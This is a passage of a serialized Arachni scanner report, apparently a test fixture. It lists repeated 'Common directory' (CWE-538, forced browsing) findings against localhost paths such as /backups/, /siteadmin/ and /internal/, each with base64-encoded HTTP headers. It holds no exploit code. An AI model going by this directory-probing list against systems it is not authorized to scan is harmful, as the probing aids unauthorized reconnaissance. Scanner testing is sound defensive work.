S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/samples/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/samples/ injected: samples id: samples elem: path remarks: {} method: '' response: samples headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/incoming/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/incoming/ injected: incoming id: incoming elem: path remarks: {} method: '' response: incoming headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sample/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sample/ injected: sample id: sample elem: path remarks: {} method: '' response: sample headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/scripts/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/scripts/ injected: scripts id: scripts elem: path remarks: {} method: '' response: scripts headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/stats/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/stats/ injected: stats id: stats elem: path remarks: {} method: '' response: stats headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sitestats/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sitestats/ injected: sitestats id: sitestats elem: path remarks: {} method: '' response: sitestats headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/www/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/www/ injected: www id: www elem: path remarks: {} method: '' response: www headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/errors/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/errors/ injected: errors id: errors elem: path remarks: {} method: '' response: errors headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/siteadmin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/siteadmin/ injected: siteadmin id: siteadmin elem: path remarks: {} method: '' response: siteadmin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/backups/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/backups/ injected: backups id: backups elem: path remarks: {} method: '' response: backups headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/testing/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/testing/ injected: testing id: testing elem: path remarks: {} method: '' response: testing headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/internal/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/internal/ injected: internal id: internal elem: path remarks: {} method: '' response: internal headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/~home/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/~home/ injected: ~home id: ~home elem: path remarks: {} method: '' response: ~home headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/home/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/home/ injected: home id: home elem: path remarks: :stuff: - Blah - Blah2 method: '' response: home headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/~guest/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/~guest/ injected: ~guest id: ~guest elem: path remarks: {} method: '' response: ~guest headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/~nobody/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/~nobody/ injected: ~nobody id: ~nobody elem: path remarks: {} method: '' response: ~nobody headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries 